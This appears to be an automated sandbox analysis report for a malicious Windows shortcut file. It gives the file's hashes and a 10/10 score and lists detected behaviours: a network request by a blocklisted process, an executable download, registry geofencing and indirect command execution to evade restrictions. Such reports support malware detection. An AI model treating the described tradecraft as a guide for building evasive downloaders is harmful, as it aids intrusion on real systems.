Extracted

• • Target

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c.lnk

  • Size

    272KB

  • MD5

    47c69db79640bcff28c4609d7cb9fdf1

  • SHA1

    9b7d6e44525f5c7b1ad0ad50232ae2f00ef19c21

  • SHA256

    c3dcd725be7a2a134c82b24d55992e4940526763ca9c607a82f423527085485c

  • SHA512

    97cfbb41da9521c45c4b204c0c8cc6a551921b39f052d4b68787668e4b16185c7e70e380c25fc05731a4c9fe2fa491682fc09ceee8dbf38a11b73f1ecaa83ee4

  • SSDEEP

    24:8Wi+1hAh52pyAzPkr+/4h+sPSLDgdd79ds6xmab/U3IVqm:8WTo8zmbQEdJ9KabU3Kq

  Score

  10^/10

  defense_evasion

  • Blocklisted process makes network request

  • Downloads MZ/PE file

  • Checks computer location settings

    Looks up country code configured in the registry, likely geofence.

  • Indirect Command Execution

    Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.

    defense_evasion
  behavioral1behavioral2